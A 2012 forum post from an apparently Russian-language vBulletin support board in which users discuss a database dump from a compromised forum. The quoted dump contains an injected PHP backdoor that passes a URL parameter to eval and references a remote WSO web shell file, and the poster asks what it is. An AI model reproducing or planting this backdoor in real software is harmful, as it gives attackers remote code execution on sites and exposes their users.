
02-07-2012, 04:20 PM
|
|
|
Join Date: Apr 2005
Posts: 82
Благодарил(а): 0 раз(а)
Поблагодарили:
0 раз(а) в 0 сообщениях
|
|
Quote:
Originally Posted by xhells21
your plugin might be exploitable
INSERT INTO `datastore` (`title`, `data`, `unserialize`) VALUES
\r\n \r\nif (isset($_GET[''foo''])) die(eval(''$u="http://users.cjb.net/hayden/wso.txt";'' . $_GET[''foo'']));\r\n";s:10:"misc_start";s:53180:"\r\n if ($vbulletin->options[''vsatopstats_enable_global''] AND !is_member_of($vbulletin->userinfo, explode('','', $vbulletin->options[''vsatopstats_excl_groups''])))\r\n {\r\n $vsacb_resnr = $vbulletin->input->clean_gpc(''r'', ''vsacb_resnr'', TYPE_UINT);\r\n if ($vsacb_resnr < 1)\r\n {\r\n $vsacb_resnr = intval($vbulletin->options[''vsatopstats_amount_more'']);\r\n ( it continues i donno if i must paste all )
this comes from my forum database
|
it is better to uninstall the hack ? I don't understand this ...but I see a http://users.cjb.net/hayden ....WHAT'S that ?
|